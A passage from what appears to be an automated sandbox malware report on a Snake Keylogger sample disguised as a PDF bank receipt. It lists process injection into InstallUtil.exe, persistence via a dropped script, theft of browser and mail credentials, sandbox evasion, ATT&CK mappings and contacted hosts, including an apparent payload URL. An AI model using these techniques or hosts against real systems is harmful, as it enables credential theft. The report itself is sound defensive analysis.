              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA387F rdtsc 4_2_06DA387F
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: e-dekont (72).pdf(#U007e56 KB).exe, InvocationDescriptorRule.csReference to suspicious API methods: ((FrameworkElement)selection).FindResource((object)"TextBlockTemplate")
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8F2008Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11F8008Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\TypeName.exe "C:\Users\user\AppData\Roaming\TypeName.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeQueries volume information: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeQueries volume information: C:\Users\user\AppData\Roaming\TypeName.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4478272423.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4478272423.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		Valid Accounts1
              Native API              		111
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		211
              Process Injection              		2
              Obfuscated Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Software Packing              		Security Account Manager111
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
              Process Injection              		DCSync1
              System Network Configuration Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553407 Sample: e-dekont (72).pdf(#U007e56 ... Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 www.oleonidas.gr 2->32 34 3 other IPs or domains 2->34 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for submitted file 2->54 58 12 other signatures 2->58 8 e-dekont (72).pdf(#U007e56 KB).exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 30->56 process4 dnsIp5 36 oleonidas.gr 185.78.221.73, 443, 49704, 49719 IPHOSTGRIpDomainGR Greece 8->36 24 C:\Users\user\AppData\Roaming\TypeName.exe, PE32 8->24 dropped 26 C:\Users\...\TypeName.exe:Zone.Identifier, ASCII 8->26 dropped 28 C:\Users\user\AppData\...\TypeName.vbs, ASCII 8->28 dropped 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->64 66 Writes to foreign memory regions 8->66 68 Injects a PE file into a foreign processes 8->68 15 InstallUtil.exe 14 2 8->15         started        70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->70 19 TypeName.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 38 checkip.dyndns.com 132.226.247.73, 49705, 49708, 49710 UTMEMUS United States 15->38 40 reallyfreegeoip.org 188.114.96.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Machine Learning detection for dropped file 19->44 46 Writes to foreign memory regions 19->46 48 Injects a PE file into a foreign processes 19->48 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal browser information (history, passwords, etc) 21->62

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              e-dekont (72).pdf(#U007e56 KB).exe11%ReversingLabs
              e-dekont (72).pdf(#U007e56 KB).exe11%VirustotalBrowse
              e-dekont (72).pdf(#U007e56 KB).exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\TypeName.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\TypeName.exe11%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://www.oleonidas.gr/slim/Tvifaznhqk.mp40%Avira URL Cloudsafe
              http://icsharpcode.net/sharpdevelop/syntaxdefinition/20080%Avira URL Cloudsafe
              https://www.oleonidas.gr0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              oleonidas.gr
              		185.78.221.73
              		truefalse
                		unknown
                reallyfreegeoip.org
                		188.114.96.3
                		truefalse
                  		high
                  checkip.dyndns.com
                  		132.226.247.73
                  		truefalse
                    		high
                    www.oleonidas.gr
                    		unknown
                    		unknowntrue
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          		high
                          https://reallyfreegeoip.org/xml/66.23.206.109false
                            		high
                            https://www.oleonidas.gr/slim/Tvifaznhqk.mp4false
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/mgravell/protobuf-netie-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              https://reallyfreegeoip.org/xml/66.23.206.109$InstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000342A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/14436606/23354e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netJe-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008TypeName.exe.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://stackoverflow.com/q/11564914/23354;e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/2152978/23354e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        http://checkip.dyndns.org/qe-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033FF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-nete-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4478272423.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003495000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000347A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003488000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000342A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, 